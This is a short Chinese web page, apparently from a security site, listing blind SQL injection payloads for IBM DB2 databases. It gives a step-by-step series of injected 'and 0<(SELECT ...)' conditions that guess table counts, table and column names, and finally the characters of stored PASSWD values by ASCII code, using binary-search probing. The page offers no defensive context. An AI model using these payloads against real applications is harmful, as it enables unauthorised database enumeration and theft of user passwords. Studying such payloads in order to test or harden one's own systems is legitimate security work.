//内容来自安云网
DB2数据库SQL注入语句整理 //本文来自安云网 以下均是是整形的注入,采用半折法猜解 //内容来自安云网 猜用户表数量: and 0<(SELECT count(NAME) FROM SYSIBM.SYSTABLES where CREATOR=USER) //内容来自安云网 猜表长度: and 3<(SELECT LENGTH(NAME) FROM SYSIBM.SYSTABLES where name not in(’COLUMNS’) fetch first 1 rows only) 猜表第一个字符ASCII码: and 3<(SELECT ASCII(SUBSTR(NAME,1,1)) FROM SYSIBM.SYSTABLES where name not in(’COLUMNS’) fetch first 1 rows only) 猜表内列名数量: and 1<(SELECT COUNT(COLNAME) FROM SYSCAT.columns where TABNAME=’TABLE‘) 猜第一个列名的长度 and 1<(SELECT LENGTH(COLNAME) FROM SYSCAT.columns where TABNAME=’TABLE‘ and colno=0) 猜第一个列名第一个字符的ASCII码 and 1<(SELECT ASCII(SUBSTR(COLNAME,1,1)) FROM SYSCAT.columns where TABNAME=’TABLE‘ and colno=0) 依ID排降序,猜第一个PASSWD的长度 and 0<(SELECT LENGTH(PASSWD) FROM TABLE ORDER BY ID DESC FETCH FIRST 1 ROWS ONLY) 依ID排降序,猜第一个PASSWD第一个字符的ASCII码 and 0<(SELECT ASCII(SUBSTR(PASSWD,1,1)) FROM TABLE ORDER BY ID DESC FETCH FIRST 1 ROWS ONLY) 猜第二个PASSWD第一个字符的ASCII码 and 0<(SELECT ASCII(SUBSTR(PASSWD,1,1)) FROM TABLE where PASSWD not in(’grou1‘) fetch first 1 rows only)
本文标题:
DB2数据库SQL注入语句整理
安云网
|